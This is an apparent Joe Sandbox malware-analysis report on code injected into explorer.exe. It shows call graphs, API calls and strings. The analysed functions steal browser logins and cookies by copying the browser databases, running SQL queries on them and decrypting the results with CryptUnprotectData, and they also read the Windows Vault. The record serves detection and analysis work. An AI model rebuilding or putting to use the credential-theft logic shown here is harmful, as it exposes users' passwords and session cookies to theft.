DeleteFileW CopyFileW 28326 a037a8 28325->28326 28327 a0379e 28325->28327 28329 a54bec 89 API calls 28326->28329 28371 a0349b 31 API calls 28327->28371 28332 a037b3 28329->28332 28330 a03c15 DeleteFileW 28331 a01011 3 API calls 28330->28331 28331->28322 28332->28330 28333 a03c0c 28332->28333 28372 a01000 GetProcessHeap RtlAllocateHeap 28332->28372 28334 a53848 76 API calls 28333->28334 28334->28330 28336 a037e3 28373 a202ec 94 API calls 28336->28373 28339 a03bd9 lstrlen 28340 a03c05 28339->28340 28341 a03be5 28339->28341 28343 a01011 3 API calls 28340->28343 28379 a01798 lstrlen 28341->28379 28343->28333 28344 a03bf3 28380 a01798 lstrlen 28344->28380 28345 a03833 RtlCompareMemory 28346 a03a37 CryptUnprotectData 28345->28346 28364 a037ee 28345->28364 28346->28364 28349 a03bfc 28381 a01798 lstrlen 28349->28381 28350 a03bcc 28378 a1fb92 93 API calls 28350->28378 28352 a03867 RtlZeroMemory 28374 a01000 GetProcessHeap RtlAllocateHeap 28352->28374 28354 a01fa7 19 API calls 28354->28364 28355 a01011 3 API calls 28355->28364 28356 a03b0f lstrlen 28357 a03b21 lstrlen 28356->28357 28356->28364 28357->28364 28358 a01000 GetProcessHeap RtlAllocateHeap 28358->28364 28360 a03987 lstrlen 28362 a03999 lstrlen 28360->28362 28360->28364 28361 a03b66 wsprintfA lstrlen 28363 a03ba3 lstrcat 28361->28363 28361->28364 28362->28364 28363->28364 28364->28345 28364->28346 28364->28350 28364->28352 28364->28354 28364->28355 28364->28356 28364->28358 28364->28360 28364->28363 28375 a02112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 28364->28375 28376 a02112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 28364->28376 28377 a202ec 94 API calls 28364->28377 28366 a039de wsprintfA lstrlen 28367 a03a1b lstrcat 28366->28367 28368 a03a0d 28366->28368 28369 a01011 3 API calls 28367->28369 28368->28367 28369->28364 28370->28325 28371->28326 28372->28336 28373->28364 28374->28364 28375->28366 28376->28361 28377->28364 28378->28339 28379->28344 28380->28349 28381->28340 28430 a0411b 28431 a04045 50 API calls 28430->28431 28432 a0412b 28431->28432 28433 a04045 50 API calls 28432->28433 28434 a0413b 28433->28434 28715 a184a7 30 API calls 28823 a37762 memset memset memcpy 27737 a04164 27740 a04045 27737->27740 27759 a03fdc 27740->27759 27743 a03fdc 50 API calls 27744 a0407a 27743->27744 27745 a03fdc 50 API calls 27744->27745 27746 a0408d 27745->27746 27747 a03fdc 50 API calls 27746->27747 27748 a040a0 27747->27748 27749 a03fdc 50 API calls 27748->27749 27750 a040b3 27749->27750 27751 a03fdc 50 API calls 27750->27751 27752 a040c6 27751->27752 27753 a03fdc 50 API calls 27752->27753 27754 a040d9 27753->27754 27755 a03fdc 50 API calls 27754->27755 27756 a040ec 27755->27756 27757 a03fdc 50 API calls 27756->27757 27758 a040ff 27757->27758 27770 a01afe 27759->27770 27762 a0403f 27762->27743 27767 a04038 27833 a01011 27767->27833 27838 a01000 GetProcessHeap RtlAllocateHeap 27770->27838 27772 a01b0d SHGetFolderPathW 27773 a01b20 27772->27773 27777 a01b63 27772->27777 27774 a01011 3 API calls 27773->27774 27775 a01b28 27774->27775 27775->27777 27839 a019e5 27775->27839 27777->27762 27778 a0199d 27777->27778 27854 a01953 27778->27854 27780 a019a6 27781 a01011 3 API calls 27780->27781 27782 a019af 27781->27782 27783 a03ed9 27782->27783 27784 a03fd1 27783->27784 27785 a03eed 27783->27785 27784->27767 27805 a01d4a 27784->27805 27785->27784 27860 a01000 GetProcessHeap RtlAllocateHeap 27785->27860 27787 a03f01 PathCombineW FindFirstFileW 27788 a03f27 27787->27788 27789 a03fca 27787->27789 27790 a03f32 lstrcmpiW 27788->27790 27791 a03f78 lstrcmpiW 27788->27791 27861 a01000 GetProcessHeap RtlAllocateHeap 27788->27861 27792 a01011 3 API calls 27789->27792 27793 a03faf FindNextFileW 27790->27793 27794 a03f42 lstrcmpiW 27790->27794 27791->27788 27791->27793 27792->27784 27793->27788 27796 a03fc3 FindClose 27793->27796 27794->27793 27797 a03f56 27794->27797 27796->27789 27878 a01000 GetProcessHeap RtlAllocateHeap 27797->27878 27799 a03f92 PathCombineW 27862 a03e04 27799->27862 27800 a03f60 PathCombineW 27802 a03ed9 23 API calls 27800->27802 27803 a03f76 27802->27803 27804 a01011 3 API calls 27803->27804 27804->27793 27806 a01d62 27805->27806 27807 a01eb4 27805->27807 27806->27807 27911 a019b4 27806->27911 27807->27767 27810 a01d79 27813 a01953 6 API calls 27810->27813 27811 a01d8b 27812 a01953 6 API calls 27811->27812 27814 a01d83 27812->27814 27813->27814 27814->27807 27815 a01da3 FindFirstFileW 27814->27815 27816 a01dba 27815->27816 27817 a01ead 27815->27817 27819 a01dc5 lstrcmpiW 27816->27819 27820 a01953 6 API calls 27816->27820 27824 a0199d 9 API calls 27816->27824 27818 a01011 3 API calls 27817->27818 27818->27807 27821 a01ddd lstrcmpiW 27819->27821 27822 a01e8e FindNextFileW 27819->27822 27820->27816 27821->27822 27830 a01df5 27821->27830 27822->27816 27823 a01ea2 FindClose 27822->27823 27823->27817 27826 a01e54 lstrcmpiW 27824->27826 27825 a019b4 lstrlenW 27825->27830 27826->27830 27827 a01011 3 API calls 27827->27822 27829 a01953 6 API calls 27829->27830 27830->27825 27830->27827 27830->27829 27831 a0199d 9 API calls 27830->27831 27832 a01d4a 12 API calls 27830->27832 27915 a01cf7 GetProcessHeap RtlAllocateHeap lstrlenW RtlComputeCrc32 27830->27915 27831->27830 27832->27830 27916 a01162 VirtualQuery 27833->27916 27836 a0102d 27836->27762 27837 a0101d GetProcessHeap RtlFreeHeap 27837->27836 27838->27772 27840 a019f7 27839->27840 27841 a019fa RegOpenKeyExW 27839->27841 27840->27841 27842 a01aa2 27841->27842 27843 a01a28 RegQueryValueExW 27841->27843 27845 a019e5 5 API calls 27842->27845 27846 a01ab9 27842->27846 27844 a01a94 RegCloseKey 27843->27844 27847 a01a46 27843->27847 27844->27842 27844->27846 27845->27846 27846->27775 27847->27844 27853 a01000 GetProcessHeap RtlAllocateHeap 27847->27853 27849 a01a61 RegQueryValueExW 27850 a01a8b 27849->27850 27851 a01a7f 27849->27851 27852 a01011 3 API calls 27850->27852 27851->27844 27852->27851 27853->27849 27855 a01964 lstrlenW lstrlenW 27854->27855 27859 a01000 GetProcessHeap RtlAllocateHeap 27855->27859 27858 a01986 lstrcatW lstrcatW 27858->27780 27859->27858 27860->27787 27861->27799 27879 a01b6a 27862->27879 27864 a03e0f 27865 a03ec7 27864->27865 27885 a01c31 CreateFileW 27864->27885 27865->27803 27872 a03ebf 27873 a01011 3 API calls 27872->27873 27873->27865 27874 a03e6c RtlCompareMemory 27875 a03e7e CryptUnprotectData 27874->27875 27877 a03ea8 27874->27877 27875->27877 27876 a01011 3 API calls 27876->27872 27877->27876 27878->27800 27880 a01b99 27879->27880 27881 a01b6f 27879->27881 27880->27864 27881->27880 27882 a01b76 CreateFileW 27881->27882 27883 a01b95 27882->27883 27884 a01b8d CloseHandle 27882->27884 27883->27864 27884->27883 27886 a01c53 GetFileSize 27885->27886 27887 a01c98 27885->27887 27888 a01c90 CloseHandle 27886->27888 27889 a01c63 27886->27889 27887->27865 27896 a02fb1 27887->27896 27888->27887 27908 a01000 GetProcessHeap RtlAllocateHeap 27889->27908 27891 a01c6b ReadFile 27892 a01c80 27891->27892 27893 a01c87 27891->27893 27892->27888 27892->27893 27894 a01011 3 API calls 27893->27894 27895 a01c8e 27894->27895 27895->27888 27897 a02ff2 27896->27897 27898 a02fb8 StrStrIA 27896->27898 27897->27865 27902 a0123b lstrlen 27897->27902 27898->27897 27899 a02fcd lstrlen StrStrIA 27898->27899 27899->27897 27900 a02fe7 27899->27900 27909 a0190b 6 API calls 27900->27909 27903 a01256 CryptStringToBinaryA 27902->27903 27904 a0129b 27902->27904 27903->27904 27905 a01272 27903->27905 27904->27872 27904->27874 27904->27877 27910 a01000 GetProcessHeap RtlAllocateHeap 27905->27910 27907 a0127e CryptStringToBinaryA 27907->27904 27908->27891 27909->27897 27910->27907 27912 a019bc 27911->27912 27914 a019d4 27911->27914 27913 a019c3 lstrlenW 27912->27913 27912->27914 27913->27914 27914->27810 27914->27811 27915->27830 27917 a01019 27916->27917 27917->27836 27917->27837 28825 a27f67 24 API calls 28826 a0ab68 22 API calls 28717 a35d6f 20 API calls 28718 a1a16f 33 API calls 27964 a02f77 27969 a02e30 StrStrIW 27964->27969 27967 a02e30 22 API calls 27968 a02fab 27967->27968 27970 a02e57 27969->27970 27974 a02ebc 27969->27974 27971 a019e5 9 API calls 27970->27971 27975 a02e68 27971->27975 27973 a02ed0 RegOpenKeyExW 27976 a02f68 27973->27976 27993 a02eee 27973->27993 27995 a01000 GetProcessHeap RtlAllocateHeap 27974->27995 27975->27974 27996 a01bc5 10 API calls 27975->27996 27979 a01011 3 API calls 27976->27979 27978 a02f50 RegEnumKeyExW 27981 a02f5e RegCloseKey 27978->27981 27978->27993 27982 a02f6f 27979->27982 27980 a02e75 27983 a02eb5 27980->27983 27986 a01afe 10 API calls 27980->27986 27981->27976 27982->27967 27985 a01011 3 API calls 27983->27985 27984 a01953 6 API calls 27984->27993 27985->27974 27987 a02e83 27986->27987 27989 a02e91 27987->27989 27991 a0199d 9 API calls 27987->27991 27988 a0199d 9 API calls 27988->27993 27990 a01011 3 API calls 27989->27990 27990->27983 27991->27989 27992 a02e30 18 API calls 27992->27993 27993->27978 27993->27984 27993->27988 27993->27992 27994 a01011 3 API calls 27993->27994 27994->27993 27995->27973 27996->27980 28721 a1c97b memcpy 28828 a26340 92 API calls 28722 a2e141 18 API calls 28830 a1f74d 18 API calls 28724 a0a558 18 API calls 28725 a2e558 22 API calls

                                                                                                                                                      Executed Functions

                                                                                                                                                      Function 00A03717 Relevance: 45.9, APIs: 19, Strings: 7, Instructions: 401stringfileencryptionCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 0 a03717-a03730 call a01b6a 3 a03736-a0374c 0->3 4 a03c37-a03c3d 0->4 5 a03762-a0379c call a01000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 3->5 6 a0374e-a03757 call a0302d 3->6 11 a037a8-a037b5 call a54bec 5->11 12 a0379e-a037a3 call a0349b 5->12 10 a0375c-a0375e 6->10 10->5 16 a03c15-a03c1e DeleteFileW call a01011 11->16 17 a037bb-a037d3 call a3eeb8 11->17 12->11 21 a03c23-a03c28 16->21 22 a037d9-a037f1 call a01000 call a202ec 17->22 23 a03c0c-a03c10 call a53848 17->23 21->4 24 a03c2a-a03c32 call a02ffa 21->24 31 a03bd0-a03be3 call a1fb92 lstrlen 22->31 32 a037f7 22->32 23->16 24->4 38 a03c05-a03c07 call a01011 31->38 39 a03be5-a03c00 call a01798 * 3 31->39 33 a037fc-a03816 call a01fa7 32->33 41 a03bb6-a03bc6 call a202ec 33->41 42 a0381c-a0382d 33->42 38->23 39->38 41->33 55 a03bcc 41->55 45 a03833-a03843 RtlCompareMemory 42->45 46 a03a37-a03a51 CryptUnprotectData 42->46 45->46 50 a03849-a0384b 45->50 46->41 48 a03a57-a03a5c 46->48 48->41 52 a03a62-a03a78 call a01fa7 48->52 50->46 54 a03851-a03856 50->54 61 a03a86-a03a9d call a01fa7 52->61 62 a03a7a-a03a80 52->62 54->46 58 a0385c-a03861 54->58 55->31 58->46 60 a03867-a038ed RtlZeroMemory call a01000 58->60 73 a038f3-a03909 call a01fa7 60->73 74 a03a2e-a03a32 60->74 68 a03aab-a03ac2 call a01fa7 61->68 69 a03a9f-a03aa5 61->69 62->61 64 a03a82 62->64 64->61 79 a03ad0-a03aed call a01fa7 68->79 80 a03ac4-a03aca 68->80 69->68 71 a03aa7 69->71 71->68 83 a03917-a0392d call a01fa7 73->83 84 a0390b-a03911 73->84 75 a03bb1 call a01011 74->75 75->41 90 a03af7-a03b01 79->90 91 a03aef-a03af1 79->91 80->79 82 a03acc 80->82 82->79 92 a0393b-a03952 call a01fa7 83->92 93 a0392f-a03935 83->93 84->83 86 a03913 84->86 86->83 95 a03b03-a03b05 90->95 96 a03b0f-a03b1b lstrlen 90->96 91->90 94 a03af3 91->94 103 a03960-a03979 call a01fa7 92->103 104 a03954-a0395a 92->104 93->92 97 a03937 93->97 94->90 95->96 99 a03b07-a03b0b 95->99 96->41 100 a03b21-a03b2a lstrlen 96->100 97->92 99->96 100->41 102 a03b30-a03b4f call a01000 100->102 110 a03b51 102->110 111 a03b59-a03b93 call a02112 wsprintfA lstrlen 102->111 113 a03987-a03993 lstrlen 103->113 114 a0397b-a03981 103->114 104->103 106 a0395c 104->106 106->103 110->111 118 a03ba3-a03baf lstrcat 111->118 119 a03b95-a03ba1 call a0102f 111->119 113->74 117 a03999-a039a2 lstrlen 113->117 114->113 115 a03983 114->115 115->113 117->74 120 a039a8-a039c7 call a01000 117->120 118->75 119->118 125 a039d1-a03a0b call a02112 wsprintfA lstrlen 120->125 126 a039c9 120->126 129 a03a1b-a03a29 lstrcat call a01011 125->129 130 a03a0d-a03a19 call a0102f 125->130 126->125 129->74 130->129
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A01B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00A02893,00000000,00000000,00000000,?), ref: 00A01B82
                                                                                                                                                        • Part of subcall function 00A01B6A: CloseHandle.KERNELBASE(00000000), ref: 00A01B8F
                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,00000000), ref: 00A03778
                                                                                                                                                      • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00A03782
                                                                                                                                                      • DeleteFileW.KERNELBASE(00000000), ref: 00A03789
                                                                                                                                                      • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 00A03794
                                                                                                                                                      • RtlCompareMemory.NTDLL(00000000,?,00000003), ref: 00A0383B
                                                                                                                                                      • RtlZeroMemory.NTDLL(?,00000040), ref: 00A03870
                                                                                                                                                      • lstrlen.KERNEL32(?,?,?,?,?), ref: 00A0398B
                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 00A0399A
                                                                                                                                                      • wsprintfA.USER32 ref: 00A039F1
                                                                                                                                                      • lstrlen.KERNEL32(00000000,?,?), ref: 00A039FD
                                                                                                                                                      • lstrcat.KERNEL32(00000000,?), ref: 00A03A21
                                                                                                                                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00A03A49
                                                                                                                                                      • lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 00A03B13
                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 00A03B22
                                                                                                                                                      • wsprintfA.USER32 ref: 00A03B79
                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 00A03B85
                                                                                                                                                      • lstrcat.KERNEL32(00000000,?), ref: 00A03BA9
                                                                                                                                                      • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00A03BDA
                                                                                                                                                      • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 00A03C16
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrlen$File$DeleteMemoryTemplstrcatwsprintf$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                                                                                                                      • String ID: %sTRUE%s%s%s%s%s$0$COOKIES$FALSE$SELECT host_key,path,is_secure,name,encrypted_value FROM cookies$TRUE$v1
                                                                                                                                                      • API String ID: 584740257-404540950
                                                                                                                                                      • Opcode ID: a1e446594a42fe15f22c4ef312875051eb6569a3ddccba451011895d12c284d3
                                                                                                                                                      • Instruction ID: 69959ee1583b588c8bf29e1dc3b3d07e47e606536cf627a23b50dd6f653c8a00
                                                                                                                                                      • Opcode Fuzzy Hash: a1e446594a42fe15f22c4ef312875051eb6569a3ddccba451011895d12c284d3
                                                                                                                                                      • Instruction Fuzzy Hash: 76E1DA72208349AFDB11EF64E980A6FBBEDBF85344F44892CF88187291DB75C905CB52
                                                                                                                                                      Function 00A02198 Relevance: 33.5, APIs: 12, Strings: 7, Instructions: 242libraryloaderCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 134 a02198-a021c9 RtlZeroMemory GetVersionExW 135 a021d7-a021dc 134->135 136 a021cb-a021d0 134->136 138 a021de 135->138 139 a021e3-a021f6 LoadLibraryW 135->139 137 a021d2 136->137 136->138 137->135 138->139 140 a0249b-a024a3 139->140 141 a021fc-a0223e GetProcAddress * 5 139->141 142 a02492-a0249a FreeLibrary 141->142 143 a02244-a0224a 141->143 142->140 143->142 144 a02250-a02252 143->144 144->142 145 a02258-a0225a 144->145 145->142 146 a02260-a02265 145->146 146->142 147 a0226b-a02277 146->147 148 a0227e-a02280 147->148 148->142 149 a02286-a022a5 148->149 151 a0248b-a0248f 149->151 152 a022ab-a022b3 149->152 151->142 153 a02483 152->153 154 a022b9-a022c5 152->154 153->151 155 a022c9-a022db 154->155 156 a022e1-a022f1 RtlCompareMemory 155->156 157 a02365-a02375 RtlCompareMemory 155->157 158 a02452-a02475 156->158 160 a022f7-a02348 call a01953 * 3 156->160 157->158 159 a0237b-a023c9 call a01953 * 3 157->159 158->155 163 a0247b-a0247f 158->163 176 a023e4-a023ea 159->176 178 a023cb-a023dc call a01953 159->178 160->176 177 a0234e-a02363 call a01953 160->177 163->153 181 a02431-a02433 176->181 182 a023ec-a023ee 176->182 190 a023e0 177->190 178->190 184 a02435-a02437 call a01011 181->184 185 a0243c-a0243e 181->185 187 a023f0-a023f2 182->187 188 a0242a-a0242c call a01011 182->188 184->185 192 a02440-a02442 call a01011 185->192 193 a02447-a02449 185->193 187->188 194 a023f4-a023f6 187->194 188->181 190->176 192->193 193->158 197 a0244b-a0244d call a01011 193->197 194->188 196 a023f8-a02406 StrStrIW 194->196 198 a02426 196->198 199 a02408-a02421 call a017c0 * 3 196->199 197->158 198->188 199->198
                                                                                                                                                      APIs
                                                                                                                                                      • RtlZeroMemory.NTDLL(?,00000114), ref: 00A021AF
                                                                                                                                                      • GetVersionExW.KERNEL32(?), ref: 00A021BE
                                                                                                                                                      • LoadLibraryW.KERNELBASE(vaultcli.dll), ref: 00A021E8
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 00A0220A
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 00A02214
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 00A02220
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 00A0222A
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,VaultFree), ref: 00A02236
                                                                                                                                                      • RtlCompareMemory.NTDLL(?,00A61110,00000010), ref: 00A022E8
                                                                                                                                                      • RtlCompareMemory.NTDLL(?,00A61110,00000010), ref: 00A0236C
                                                                                                                                                        • Part of subcall function 00A01953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00A02F0C), ref: 00A01973
                                                                                                                                                        • Part of subcall function 00A01953: lstrlenW.KERNEL32(00A56564,?,?,00A02F0C), ref: 00A01978
                                                                                                                                                        • Part of subcall function 00A01953: lstrcatW.KERNEL32(00000000,?,?,?,00A02F0C), ref: 00A01990
                                                                                                                                                        • Part of subcall function 00A01953: lstrcatW.KERNEL32(00000000,00A56564,?,?,00A02F0C), ref: 00A01994
                                                                                                                                                      • StrStrIW.SHLWAPI(?,Internet Explorer), ref: 00A023FE
                                                                                                                                                      • FreeLibrary.KERNELBASE(00000000), ref: 00A02493
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$Memory$CompareLibrarylstrcatlstrlen$FreeLoadVersionZero
                                                                                                                                                      • String ID: Internet Explorer$VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                                                                                                                                                      • API String ID: 2583887280-2831467701
                                                                                                                                                      • Opcode ID: d7ac2ff0d562dc08236156a0c45ea9113a3c6a9d1380783bde8caba70868d8b6
                                                                                                                                                      • Instruction ID: 57d3d2fc1566184f3b9058796bbc47eae0db68328239165378dae997ce9a6e61
                                                                                                                                                      • Opcode Fuzzy Hash: d7ac2ff0d562dc08236156a0c45ea9113a3c6a9d1380783bde8caba70868d8b6
                                                                                                                                                      • Instruction Fuzzy Hash: 1691AE71A08308AFD718DF61E898A6FBBE5BFC8744F40882DF98597291DB71D805CB42
                                                                                                                                                      Function 00A03098 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 248fileencryptionCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 261 a03098-a030b1 call a01b6a 264 a030b7-a030cd 261->264 265 a033ba-a033c0 261->265 266 a030e3-a03128 call a01000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW call a54bec 264->266 267 a030cf-a030d8 call a0302d 264->267 274 a0339b-a033a4 DeleteFileW call a01011 266->274 275 a0312e-a03146 call a3eeb8 266->275 270 a030dd-a030df 267->270 270->266 279 a033a9-a033ab 274->279 280 a03392-a03396 call a53848 275->280 281 a0314c-a03158 call a202ec 275->281 279->265 282 a033ad-a033b5 call a02ffa 279->282 280->274 287 a03389-a0338d call a1fb92 281->287 288 a0315e-a03161 281->288 282->265 287->280 290 a03165-a0317f call a01fa7 288->290 293 a03185-a03196 290->293 294 a0336f-a0337b call a202ec 290->294 295 a0319c-a031ac RtlCompareMemory 293->295 296 a032cd-a032e7 CryptUnprotectData 293->296 294->290 301 a03381-a03385 294->301 295->296 299 a031b2-a031b4 295->299 296->294 298 a032ed-a032f2 296->298 298->294 302 a032f4-a0330a call a01fa7 298->302 299->296 303 a031ba-a031bf 299->303 301->287 308 a03318-a0332f call a01fa7 302->308 309 a0330c-a03312 302->309 303->296 305 a031c5-a031ca 303->305 305->296 307 a031d0-a03253 RtlZeroMemory call a01000 305->307 319 a03255-a0326b call a01fa7 307->319 320 a032bd 307->320 315 a03331-a03337 308->315 316 a0333d-a03343 308->316 309->308 313 a03314 309->313 313->308 315->316 318 a03339 315->318 321 a03351-a0336a call a01798 * 3 316->321 322 a03345-a0334b 316->322 318->316 330 a03279-a0328e call a01fa7 319->330 331 a0326d-a03273 319->331 324 a032c1-a032c8 call a01011 320->324 321->294 322->321 325 a0334d 322->325 324->294 325->321 339 a03290-a03296 330->339 340 a0329c-a032bb call a01798 * 3 330->340 331->330 334 a03275 331->334 334->330 339->340 341 a03298 339->341 340->324 341->340
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A01B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00A02893,00000000,00000000,00000000,?), ref: 00A01B82
                                                                                                                                                        • Part of subcall function 00A01B6A: CloseHandle.KERNELBASE(00000000), ref: 00A01B8F
                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,00000000), ref: 00A030F9
                                                                                                                                                      • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00A03103
                                                                                                                                                      • DeleteFileW.KERNELBASE(00000000), ref: 00A0310A
                                                                                                                                                      • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 00A03115
                                                                                                                                                      • RtlCompareMemory.NTDLL(00000000,00000000,00000003), ref: 00A031A4
                                                                                                                                                      • RtlZeroMemory.NTDLL(?,00000040), ref: 00A031D7
                                                                                                                                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00A032DF
                                                                                                                                                      • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 00A0339C
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$DeleteMemoryTemp$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                                                                                                                      • String ID: 0$@$SELECT origin_url,username_value,password_value FROM logins$v1
                                                                                                                                                      • API String ID: 2757140130-4052020286
                                                                                                                                                      • Opcode ID: e3d67798678643c17f017793a768b05d389f4096b58fe238176082fc4ef4abe6
                                                                                                                                                      • Instruction ID: a6f723d053e920089cfd913b603e9c50874b0f74a2f9f2a13970e41ec4bd4b91
                                                                                                                                                      • Opcode Fuzzy Hash: e3d67798678643c17f017793a768b05d389f4096b58fe238176082fc4ef4abe6
                                                                                                                                                      • Instruction Fuzzy Hash: 1D91A972208349AFDB10DF65E984AAFBBE9AFC9744F04492DF58597290DB30DE048B12
                                                                                                                                                      Function 00A03ED9 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 82stringfileCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 413 a03ed9-a03ee7 414 a03fd1-a03fdb 413->414 415 a03eed-a03ef1 413->415 415->414 416 a03ef7-a03f21 call a01000 PathCombineW FindFirstFileW 415->416 419 a03f27-a03f30 416->419 420 a03fca-a03fcc call a01011 416->420 421 a03f32-a03f40 lstrcmpiW 419->421 422 a03f78-a03f86 lstrcmpiW 419->422 420->414 425 a03faf-a03fbd FindNextFileW 421->425 426 a03f42-a03f54 lstrcmpiW 421->426 424 a03f88-a03fa3 call a01000 PathCombineW call a03e04 422->424 422->425 435 a03fa8-a03faa call a01011 424->435 425->419 428 a03fc3-a03fc4 FindClose 425->428 426->425 429 a03f56-a03f76 call a01000 PathCombineW call a03ed9 426->429 428->420 429->435 435->425
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A01000: GetProcessHeap.KERNEL32(00000008,?,00A011C7,?,?,00000001,00000000,?), ref: 00A01003
                                                                                                                                                        • Part of subcall function 00A01000: RtlAllocateHeap.NTDLL(00000000), ref: 00A0100A
                                                                                                                                                      • PathCombineW.SHLWAPI(00000000,00000000,*.*,?,00000000), ref: 00A03F0A
                                                                                                                                                      • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 00A03F16
                                                                                                                                                      • lstrcmpiW.KERNEL32(?,00A562CC), ref: 00A03F38
                                                                                                                                                      • lstrcmpiW.KERNEL32(?,00A562D0), ref: 00A03F4C
                                                                                                                                                      • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00A03F69
                                                                                                                                                      • lstrcmpiW.KERNEL32(?,Local State), ref: 00A03F7E
                                                                                                                                                      • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00A03F9B
                                                                                                                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00A03FB5
                                                                                                                                                      • FindClose.KERNELBASE(00000000), ref: 00A03FC4
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CombineFindPathlstrcmpi$FileHeap$AllocateCloseFirstNextProcess
                                                                                                                                                      • String ID: *.*$Local State
                                                                                                                                                      • API String ID: 3923353463-3324723383
                                                                                                                                                      • Opcode ID: a73d680186262ad36600e6f471727e133b602ec977b71f52f3542015ef5ee8fb
                                                                                                                                                      • Instruction ID: b0301640ea8f5a283a7b1998b16c42b131cc5cf517b725f640c0117fa32f0144
                                                                                                                                                      • Opcode Fuzzy Hash: a73d680186262ad36600e6f471727e133b602ec977b71f52f3542015ef5ee8fb
                                                                                                                                                      • Instruction Fuzzy Hash: 3A21B3326007497BDB10BB70AC48ABF76BCBB81752F440629F952C71D2DB7499498661
                                                                                                                                                      Function 00A02B15 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 102filestringCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
